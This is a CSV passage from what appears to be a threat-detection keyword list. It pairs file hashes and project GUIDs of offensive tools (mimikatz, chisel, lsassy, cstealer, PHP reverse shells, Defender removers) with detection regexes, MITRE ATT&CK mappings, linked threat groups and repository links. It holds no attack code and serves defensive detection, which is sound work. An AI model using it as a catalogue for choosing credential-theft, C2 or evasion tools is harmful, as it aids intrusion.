"*3e8b305a4b6157e6f3ed492c596cfda37d27bf63e1532516aa96ec10eed3d166*",".{0,1000}3e8b305a4b6157e6f3ed492c596cfda37d27bf63e1532516aa96ec10eed3d166.{0,1000}","offensive_tool_keyword","TinyMet","meterpreter stager","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","CL0P - FIN7 - FIN11 - Silence group - GOLD EVERGREEN","C2","https://github.com/SherifEldeeb/TinyMet","1","0","#filehash","N/A","10","10","128","43","2019-08-20T04:39:22Z","2014-05-17T13:31:55Z","25168"
"*3e93d23c966b89a3e15719d482d61cb107eb12085cbace1a6453286decea13c1*",".{0,1000}3e93d23c966b89a3e15719d482d61cb107eb12085cbace1a6453286decea13c1.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","25169"
"*3e95f084c11e971e4b30805e59d4cef87b5698ba21ce72b8a228b4e33c069754*",".{0,1000}3e95f084c11e971e4b30805e59d4cef87b5698ba21ce72b8a228b4e33c069754.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","25171"
"*3e9a7fc50639f2077028d5cfd6ffeba037d03608f30af50cafc12a43d0a4a5e2*",".{0,1000}3e9a7fc50639f2077028d5cfd6ffeba037d03608f30af50cafc12a43d0a4a5e2.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","25172"
"*3e9a7fc50639f2077028d5cfd6ffeba037d03608f30af50cafc12a43d0a4a5e2*",".{0,1000}3e9a7fc50639f2077028d5cfd6ffeba037d03608f30af50cafc12a43d0a4a5e2.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","25173"
"*3ea13e5df7db6342688575fe5bbc234291a6402d56f96d9b26e2b63240505cef*",".{0,1000}3ea13e5df7db6342688575fe5bbc234291a6402d56f96d9b26e2b63240505cef.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","25174"
"*3ea656dd07b50bb2fde472461341004a231ab56ef2b3e7922910d38ec98d7278*",".{0,1000}3ea656dd07b50bb2fde472461341004a231ab56ef2b3e7922910d38ec98d7278.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","25176"
"*3ea8d03618c5dfaf31713be63196e0d2dfba5efbd2e6c6dc1787c6a2c0a41965*",".{0,1000}3ea8d03618c5dfaf31713be63196e0d2dfba5efbd2e6c6dc1787c6a2c0a41965.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","25177"
"*3EAB01B5-9B49-48D8-BFA1-5493B26CCB71*",".{0,1000}3EAB01B5\-9B49\-48D8\-BFA1\-5493B26CCB71.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","#GUIDproject","N/A","6","10","3629","1661","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z","25179"
"*3ebdcf2fcbe2c7439b0b0e3bc4dcd00a4fd4df7f02e88b160f085b35f5d2f350*",".{0,1000}3ebdcf2fcbe2c7439b0b0e3bc4dcd00a4fd4df7f02e88b160f085b35f5d2f350.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","25181"
"*3ec15909c169e37f1173d567cb4729f592002826ac0a0f5bf5e820af47195e78*",".{0,1000}3ec15909c169e37f1173d567cb4729f592002826ac0a0f5bf5e820af47195e78.{0,1000}","offensive_tool_keyword","chaos","CHAOS is a free and open-source Remote Administration Tool that allow generate binaries to control remote operating systems","T1105 - T1059 - T1021 - T1041 - T1569.002 - T1573","TA0002 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/tiagorlampert/CHAOS","1","0","#filehash","N/A","10","10","2483","541","2024-10-26T18:02:45Z","2017-07-11T06:54:56Z","25182"
"*3ec41c041f4c5b1c1c781ddcd9d0286a0a920253783edb27a8fc8085d9ecb6f8*",".{0,1000}3ec41c041f4c5b1c1c781ddcd9d0286a0a920253783edb27a8fc8085d9ecb6f8.{0,1000}","offensive_tool_keyword","cstealer","stealer discord token grabber, crypto wallet stealer, cookie stealer, password stealer, file stealer etc. app written in Python.","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/can-kat/cstealer","1","0","#filehash","N/A","10","","N/A","","","","25183"
"*3ec7beb57b5218a1fcf4586464319ef4d78ca05d00d3eb8ee13be51c8cf38cfa*",".{0,1000}3ec7beb57b5218a1fcf4586464319ef4d78ca05d00d3eb8ee13be51c8cf38cfa.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","25184"
"*3ec8a46dfacff51b3a19034479c2c68b74c92342e483295152754f939a8d1d31*",".{0,1000}3ec8a46dfacff51b3a19034479c2c68b74c92342e483295152754f939a8d1d31.{0,1000}","offensive_tool_keyword","kiglogger","malware parental control software - keylogger","T1056.001 - T1113 - T1056.004","TA0006 - TA0009","N/A","N/A","Collection","https://kidlogger.net/download.html","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","25185"
"*3EC9B9A8-0AFE-44A7-8B95-7F60E750F042*",".{0,1000}3EC9B9A8\-0AFE\-44A7\-8B95\-7F60E750F042.{0,1000}","offensive_tool_keyword","ThreatCheck","Identifies the bytes that Microsoft Defender / AMSI Consumer flags on","T1059.001 - T1059.005 - T1027.002 - T1070.004","TA0002 - TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/rasta-mouse/ThreatCheck","1","0","#GUIDproject","N/A","10","10","1185","143","2024-06-01T16:46:57Z","2020-10-08T11:22:26Z","25186"
"*3eca25646f5d9435a6d13eaed2781aaa5efad2a3e512e154892f7a5cde46805f*",".{0,1000}3eca25646f5d9435a6d13eaed2781aaa5efad2a3e512e154892f7a5cde46805f.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","25187"
"*3ECA4B56CE358B13E1128A1E6149ED07CA0A8C55997B50A1E2C4EA46BD586B84*",".{0,1000}3ECA4B56CE358B13E1128A1E6149ED07CA0A8C55997B50A1E2C4EA46BD586B84.{0,1000}","offensive_tool_keyword","ADACLScanner","A tool with GUI used to create reports of access control lists (DACLs) and system access control lists (SACLs) in Active Directory .","T1222 - T1069 - T1018","TA0002 - TA0007 - TA0043","N/A","N/A","Discovery","https://github.com/canix1/ADACLScanner","1","0","#filehash","AD Enumeration","7","10","1015","173","2025-04-11T14:35:08Z","2017-04-06T12:28:37Z","25188"
"*3ecabb1f5934079ee820bfe9f238ce6d780c2228563f55002a5921b1800118e1*",".{0,1000}3ecabb1f5934079ee820bfe9f238ce6d780c2228563f55002a5921b1800118e1.{0,1000}","offensive_tool_keyword","macro_pack","The macro_pack is a tool used to automatize obfuscation and generation of retro formats such as MS Office documents or VBS like format. Now it also handles various shortcuts formats.","T1587 - T1588 - T1027 - T1204 ","TA0005 - TA0002 - TA0008 - TA0011 - TA0042","N/A","Black Basta","Resource Development","https://github.com/sevagas/macro_pack","1","0","#filehash","N/A","10","10","2241","412","2024-08-15T14:21:39Z","2017-10-03T18:30:06Z","25189"
"*3ecff7d62c79b34f0c8bb105a9c624f3148aa59c81ab38d75bc110578bf66ecb*",".{0,1000}3ecff7d62c79b34f0c8bb105a9c624f3148aa59c81ab38d75bc110578bf66ecb.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043  - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","25190"
"*3ed6aa523846443c89fc204956bf871d327a14862e0a65dad6e6f4854937e099*",".{0,1000}3ed6aa523846443c89fc204956bf871d327a14862e0a65dad6e6f4854937e099.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","#filehash","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","25191"
"*3ee00a42a65d2df9ee571875a11f53b56c8494e90e1e8e60e128aabdb56399c8*",".{0,1000}3ee00a42a65d2df9ee571875a11f53b56c8494e90e1e8e60e128aabdb56399c8.{0,1000}","offensive_tool_keyword","RouterPassView","help you to recover your lost password from your router file","T1002 - T1552 - T1027","TA0006 - TA0007","N/A","BlackSuit - Royal - GoGoogle","Credential Access","https://www.nirsoft.net/utils/router_password_recovery.html","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","25192"
"*3ee00a42a65d2df9ee571875a11f53b56c8494e90e1e8e60e128aabdb56399c8*",".{0,1000}3ee00a42a65d2df9ee571875a11f53b56c8494e90e1e8e60e128aabdb56399c8.{0,1000}","offensive_tool_keyword","RouterPassView","help you to recover your lost password from your router file","T1002 - T1552 - T1027","TA0006 - TA0007","N/A","BlackSuit - Royal - GoGoogle","Credential Access","https://www.nirsoft.net/utils/router_password_recovery.html","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","25193"
"*3ee46311d18a046c6ade96546e1deac7040ac3fb2f92040d6ad1b7c32c77a6c8*",".{0,1000}3ee46311d18a046c6ade96546e1deac7040ac3fb2f92040d6ad1b7c32c77a6c8.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","25197"
"*3ee55b131560263d8f4d9a971e7a82e07b9b80db67fd9496ba2d2b0aeeaa2759*",".{0,1000}3ee55b131560263d8f4d9a971e7a82e07b9b80db67fd9496ba2d2b0aeeaa2759.{0,1000}","offensive_tool_keyword","php-reverse-shell","PHP shells that work on Linux OS - macOS and Windows OS","T1505.003 - T1059.003 - T1100","TA0003 - TA0005 - TA0011","N/A","Black Basta","C2","https://github.com/ivan-sincek/php-reverse-shell","1","0","#filehash","N/A","10","10","482","152","2023-10-03T09:48:21Z","2020-07-14T07:22:54Z","25198"
"*3ee6cff71aef9e5d12e628c94a0c30e37b283f424aa487cf37248690d88c8966*",".{0,1000}3ee6cff71aef9e5d12e628c94a0c30e37b283f424aa487cf37248690d88c8966.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tool","https://github.com/cobbr/SharpSploit","1","0","#filehash","N/A","10","10","1789","312","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z","25200"
"*3ef06f25d21583d9c1158704c593f3276a1056cf6d23f8c56d8dac84df5320de*",".{0,1000}3ef06f25d21583d9c1158704c593f3276a1056cf6d23f8c56d8dac84df5320de.{0,1000}","offensive_tool_keyword","DeadPotato","DeadPotato is a windows privilege escalation utility from the Potato family of exploits leveraging the SeImpersonate right to obtain SYSTEM privileges","T1134.001 - T1068  - T1055 - T1546.015","TA0004 - TA0006 - TA0011","N/A","N/A","Privilege Escalation","https://github.com/lypd0/DeadPotato","1","0","#filehash","N/A","10","4","382","45","2024-08-17T06:08:29Z","2024-07-31T01:08:30Z","25201"
"*3ef598c9422361f5ce5252d0c4261d88889b51c2c9794ca6a72c6669e77526b1*",".{0,1000}3ef598c9422361f5ce5252d0c4261d88889b51c2c9794ca6a72c6669e77526b1.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","25202"
"*3f0aaab9ed83635ff24bf9664603d16e9130183bdb15f55dd02b92d760a97833*",".{0,1000}3f0aaab9ed83635ff24bf9664603d16e9130183bdb15f55dd02b92d760a97833.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","0","#filehash","N/A","10","10","2105","251","2024-12-31T11:56:19Z","2019-12-03T14:03:41Z","25207"
"*3F0C3D9A-CFB8-4DB5-8419-1C28CBC8621D*",".{0,1000}3F0C3D9A\-CFB8\-4DB5\-8419\-1C28CBC8621D.{0,1000}","offensive_tool_keyword","VectorKernel","PoCs for Kernelmode rootkit techniques research.","T1543 - T1055 - T1134 - T1564 - T1070 - T1057 - T1574 - T1562 - T1082 - T1518","TA0003 - TA0005 - TA0004 - TA0008 - TA0007","N/A","N/A","Exploitation tool","https://github.com/daem0nc0re/VectorKernel/","1","0","#GUIDproject","N/A","10","4","367","60","2025-01-21T08:22:42Z","2023-11-23T12:36:31Z","25208"
"*3f0ff74a551ec7b47b6509a6ebf6e6ef795c7b770cc3545e2fb8296a5ce4dc05*",".{0,1000}3f0ff74a551ec7b47b6509a6ebf6e6ef795c7b770cc3545e2fb8296a5ce4dc05.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","#filehash","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","25209"
"*3f2699ac7eba269458ed98cc026ecea122a696f8198b3ce7c09381aa9ac7ebda*",".{0,1000}3f2699ac7eba269458ed98cc026ecea122a696f8198b3ce7c09381aa9ac7ebda.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","#filehash","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","25212"
"*3f2c295013df2f758d84f70a59f7510fb1b86a9e01017a0865531b6637c0afe4*",".{0,1000}3f2c295013df2f758d84f70a59f7510fb1b86a9e01017a0865531b6637c0afe4.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#filehash","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","25214"
"*3f3804de2f7ecc0b5f86d3b136512c35788c8f0933fffbd11a2350f90084106d*",".{0,1000}3f3804de2f7ecc0b5f86d3b136512c35788c8f0933fffbd11a2350f90084106d.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","25217"
"*3f3a5c2cf1feee383a348a89709d74af305d4c5dfd3d88150ec1189fadc76877*",".{0,1000}3f3a5c2cf1feee383a348a89709d74af305d4c5dfd3d88150ec1189fadc76877.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","25218"
"*3f3dfb593302ddb3b356daea1e47c3ffdeb0f304f5eef51b7aeecd1b2f15538f*",".{0,1000}3f3dfb593302ddb3b356daea1e47c3ffdeb0f304f5eef51b7aeecd1b2f15538f.{0,1000}","offensive_tool_keyword","PowerShellRunner","PowerShell runner for executing malicious payloads in order to bypass Windows Defender","T1059.001 - T1562.001 - T1218.005","TA0002 - TA0005","N/A","Turla","Defense Evasion","https://github.com/dievus/PowerShellRunner","1","0","#filehash","N/A","9","1","70","20","2021-11-22T18:43:16Z","2021-08-03T01:29:34Z","25221"
"*3f460ca63fd331cff0f5f7e7947513822b5a9fdf43ad10e551fd785b2de0adf3*",".{0,1000}3f460ca63fd331cff0f5f7e7947513822b5a9fdf43ad10e551fd785b2de0adf3.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","#filehash","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","25223"
"*3f48b595aeca862631b678662a78fe1951a607a10f0a6593a2cc86c7acb4929c*",".{0,1000}3f48b595aeca862631b678662a78fe1951a607a10f0a6593a2cc86c7acb4929c.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043  - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","25225"
"*3f4a0c9d63796dc8d7d2bb3947edf3a2722c9e783e7c7fdfa7e13f2b43eafdc3*",".{0,1000}3f4a0c9d63796dc8d7d2bb3947edf3a2722c9e783e7c7fdfa7e13f2b43eafdc3.{0,1000}","offensive_tool_keyword","sish","An open source serveo/ngrok alternative. HTTP(S)/WS(S)/TCP Tunnels to localhost using only SSH","T1572 - T1090.002","TA0010 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antoniomika/sish","1","0","#filehash","N/A","10","10","4203","325","2025-04-10T20:04:08Z","2019-02-15T15:36:23Z","25226"
"*3f4dc752db705589bdb8e487a55dbdc6891c13c557ec0383701fc5b94d8f8264*",".{0,1000}3f4dc752db705589bdb8e487a55dbdc6891c13c557ec0383701fc5b94d8f8264.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","25227"
"*3f511ce7fdc81166c2e8811560fb1a2b30b5568ccd184d915f23fd5494cd969e*",".{0,1000}3f511ce7fdc81166c2e8811560fb1a2b30b5568ccd184d915f23fd5494cd969e.{0,1000}","offensive_tool_keyword","gosecretsdump","Dump ntds.dit really fast","T1003","TA0006","N/A","Lockbit - Black Basta","Credential Access","https://github.com/C-Sto/gosecretsdump","1","0","#filehash","N/A","10","4","391","50","2021-10-01T09:11:33Z","2018-12-24T05:54:19Z","25229"
"*3F5558BD-7B94-4CB0-A46C-A7252B5BCA17*",".{0,1000}3F5558BD\-7B94\-4CB0\-A46C\-A7252B5BCA17.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","#GUIDproject","N/A","6","10","3629","1661","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z","25230"
"*3f58f14b7d8ecab48c17849a6c6660dee3f39e95ba3799f9d77339fa6b7914ed*",".{0,1000}3f58f14b7d8ecab48c17849a6c6660dee3f39e95ba3799f9d77339fa6b7914ed.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","25231"
"*3f5ea2764696b07fdb61c7b34736eae26518ed2e36a624df09fb37025659201f*",".{0,1000}3f5ea2764696b07fdb61c7b34736eae26518ed2e36a624df09fb37025659201f.{0,1000}","offensive_tool_keyword","PWDumpX","PWDumpX tool allows a user with administrative privileges to retrieve the encrypted password hashes and LSA secrets from a Windows system. This tool can be used on the local system or on one or more remote systems.","T1003.001 - T1555.003 - T1077","TA0006 - TA0008","N/A","N/A","Credential Access","https://packetstormsecurity.com/files/download/52580/PWDumpX.zip","1","0","#filehash","N/A","10","8","N/A","N/A","N/A","N/A","25232"
"*3f5ea2764696b07fdb61c7b34736eae26518ed2e36a624df09fb37025659201f*",".{0,1000}3f5ea2764696b07fdb61c7b34736eae26518ed2e36a624df09fb37025659201f.{0,1000}","offensive_tool_keyword","PWDumpX","PWDumpX tool allows a user with administrative privileges to retrieve the encrypted password hashes and LSA secrets from a Windows system. This tool can be used on the local system or on one or more remote systems.","T1003.001 - T1555.003 - T1077","TA0006 - TA0008","N/A","N/A","Credential Access","https://packetstormsecurity.com/files/download/52580/PWDumpX.zip","1","0","#filehash","N/A","10","8","N/A","N/A","N/A","N/A","25233"
"*3f63c1d262a6e900833b2dbd615f72006785c124d4ca7fda01cd621ca615865f*",".{0,1000}3f63c1d262a6e900833b2dbd615f72006785c124d4ca7fda01cd621ca615865f.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","Earth Lusca","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","#filehash","N/A","8","10","11931","1725","2025-04-20T11:30:29Z","2020-11-13T16:35:20Z","25234"
"*3f6a6c6beb96c55ae02199bf8ca34d317596dddab33ef5e1f1d129e4d8d36446*",".{0,1000}3f6a6c6beb96c55ae02199bf8ca34d317596dddab33ef5e1f1d129e4d8d36446.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","25235"
"*3f6ee397df853f26f467795a8112996db83b6db7f832c332964c954ee4cf7cd8*",".{0,1000}3f6ee397df853f26f467795a8112996db83b6db7f832c332964c954ee4cf7cd8.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","25237"
"*3f70ddcfdf1308b16a0951689520f74df87bc472cccd2e7b2ca1316b4d2b0a3a*",".{0,1000}3f70ddcfdf1308b16a0951689520f74df87bc472cccd2e7b2ca1316b4d2b0a3a.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","25238"
